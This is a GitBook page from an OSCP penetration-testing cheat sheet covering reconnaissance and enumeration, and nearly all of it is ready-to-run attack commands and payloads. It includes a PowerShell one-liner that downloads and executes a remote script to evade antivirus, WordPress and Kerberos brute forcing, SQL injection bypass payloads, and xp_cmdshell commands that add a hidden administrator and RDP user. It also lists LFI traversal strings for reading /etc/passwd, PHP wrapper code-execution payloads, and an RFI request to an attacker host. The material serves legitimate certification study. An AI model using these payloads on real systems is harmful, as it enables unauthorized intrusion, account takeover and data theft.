Securable - OSCP cheat sheet
Search…
Securable - OSCP cheat sheet
Introduction
Reconnaissance & enumeration
Gaining access
Privilege escalation
Post exploitation
Lateral movement
Buffer overflow
Misc
Powered By GitBook
Reconnaissance & enumeration
Enum, enum, enom, enomm, nom nomm!

Bash log

Log all commands and their output:
1
script target.log
Copied!

Port scanning

Nmap

1
nmap -A -sS -Pn -n x.x.x.x
Copied!
Scan all UDP port without a retry
1
nmap -sU -p- --max-retries 0 --min-rate 500 x.x.x.x
Copied!

Nc

1
nc -nvv -w 1 -z x.x.x.x 1-100
Copied!
This nc command can be very useful to check egress filtering -> see below

PowerShell (in memory -> AV evasion)

1
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/Invoke-Portscan.ps1');Invoke-Portscan -Hosts x.x.x.x"
Copied!

Host enum

1
nikto -h x.x.x.x
Copied!
1
enum4linux x.x.x.x
Copied!
Is the target 32 or 64 bit? https://github.com/SecureAuthCorp/impacket/blob/master/examples/getArch.py
1
python getArch.py -target x.x.x.x
Copied!

DNS zone transfer

1
dig axfr domain.com @nameserver
Copied!

Web fuzzing

Gobuster
1
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 20
Copied!
1
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt -t 20
Copied!
1
gobuster -u x.x.x.x -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 20 -x .txt,.php
Copied!
Wfuzz
1
wfuzz -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 400,404,500 http://x.x.x.x/FUZZ
Copied!
1
wfuzz -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt --hc 400,404,500 http://x.x.x.x/FUZZ
Copied!

Samba (SMB)

Do not underestimate this one ;)
1
smbclient -L x.x.x.x
Copied!
1
nmap --script=smb-check-vulns.nse x.x.x.x
Copied!
1
smbmount //x.x.x.x/share /mnt –o username=hodor,workgroup=hodor
Copied!
1
mount -t cifs //x.x.x.x/share /mnt
Copied!
1
mount -t cifs -o username=hodor,password=hodor //x.x.x.x/share /mnt
Copied!
1
smbclient \\\\x.x.x.x\\share
Copied!
Anonymous bind using rpcclient:
1
rpcclient -U "" x.x.x.x
Copied!

SNMP

Scan using the default community string:
1
snmpwalk -c public -v1 x.x.x.x
Copied!
Discover valid usernames by brute force querying possible usernames against a Kerberos service (source: https://nmap.org/nsedoc/scripts/krb5-enum-users.html)
1
nmap -p 88 --script krb5-enum-users --script-args krb5-enum-users.realm='domain.local',userdb=/usr/share/wordlists/SecLists/Usernames/top_shortlist.txt x.x.x.x
Copied!

CMS

CMSmap

1
cmsmap.py https://x.x.x.x
Copied!

WPscan

1
wpscan --url https://x.x.x.x
Copied!
Bruteforce login:
1
wpscan --url http://x.x.x.x --wordlist /usr/share/wordlists/SecLists/Passwords/best1050.txt --username admin --threads 10
Copied!

SQL injection

Test for authentication bypass

1
1' or '1'='1
2
1' or '1'='1'
3
1' or '1'='1'--
4
' or 1=1 --
5
a' or 1=1 --
6
" or 1=1 --
7
a" or 1=1 --
8
' or 1=1 #
9
" or 1=1 #
10
or 1=1 --
11
' or 'x'='x
12
" or "x"="x
13
') or ('x'='x
14
") or ("x"="x
Copied!

Use time delays to find injectable parameter

1
';WAITFOR DELAY '0:0:5'--
2
3
SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/
4
5
+BENCHMARK(40000000,SHA1(1337))+
6
'%2Bbenchmark(3200,SHA1(1))%2B'
Copied!
If the above works try to enable xp_cmdshell (source: http://pentestmonkey.net/blog/resurecting-xp_cmdshell)
1
EXEC sp_configure 'show advanced options', 1;
2
RECONFIGURE;
3
EXEC sp_configure 'xp_cmdshell', 1;
4
RECONFIGURE;
Copied!
xp_cmdshell - test ping
1
';exec master..xp_cmdshell 'ping -n 3 x.x.x.x'; --
Copied!
xp_cmdshell - add admin user
1
';exec master..xp_cmdshell 'net user hodor Qwerty123! /ADD && net localgroup administrators hodor /ADD'; --
Copied!
xp_cmdshell - add admin user and to RDP group
1
';exec master..xp_cmdshell 'net user hodor Qwerty123! /ADD && net localgroup administrators hodor /ADD && net localgroup "Remote Desktop Users" hodor /ADD'; --
Copied!

Local File Inclusion (LFI)

Basic checks

Linux
1
../../../../../../../../../../etc/passwd
2
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
3
../../../../../../../../../../etc/passwd%00
4
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%2500
Copied!
Windows
1
../../../../../../../../../../boot.ini
2
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
3
../../../../../../../../../../boot.ini%00
4
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%2500
5
6
../../../../../../../../../../windows/system32/drivers/etc/hosts
7
../../../../../../../../../../windows/system32/drivers/etc/hosts%00
8
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/system32/drivers/etc/hosts
9
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/system32/drivers/etc/hosts%2500
Copied!
Wordlists: https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI

LFI Wrappers

expect://
1
http://x.x.x.x/blah?parameter=expect://whoami
Copied!
data://
1
http://x.x.x.x/blah?parameter=data://text/plain;base64,PD8gcGhwaW5mbygpOyA/Pg==
2
# the base64 encoded payload is: <? phpinfo(); ?>
Copied!
input://
1
http://x.x.x.x/blah?parameter=php://input
2
# POST data (using Hackbar)
3
<? phpinfo(); ?>
Copied!

LFI to RCE

Just check: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20inclusion#wrapper-data

Remote File Inclusion (RFI)

Example request (where "x.x.x.x" is your attacker's IP):
1
GET /supersecret/admin.php?path=http://x.x.x.x/phpinfo.php%00
Copied!

Check for egress filtering

In other words: find an outgoing port for a reverse shell. First start TCPdump at your own box
1
tcpdump -i eth0
Copied!
Run at target (where x.x.x.x is your attacking box)
1
nc -nvv -w 1 -z x.x.x.x 1-100
Copied!

Files and file systems

Unmounted file systems
1
cat /etc/fstab
Copied!
World writeable directories
1
find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root
Copied!
World writeable files
1
find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null
Copied!
Writeable config files
1
find /etc/ -writable -type f 2>/dev/null
Copied!

Previous
Introduction
Next
Gaining access
Last modified 1yr ago
Copy link
Contents
Bash log
Port scanning
Nmap
Nc
PowerShell (in memory -> AV evasion)
Host enum
DNS zone transfer
Web fuzzing
Samba (SMB)
SNMP
CMS
CMSmap
WPscan
SQL injection
Test for authentication bypass
Use time delays to find injectable parameter
Local File Inclusion (LFI)
Basic checks
LFI Wrappers
LFI to RCE
Remote File Inclusion (RFI)
Check for egress filtering
Files and file systems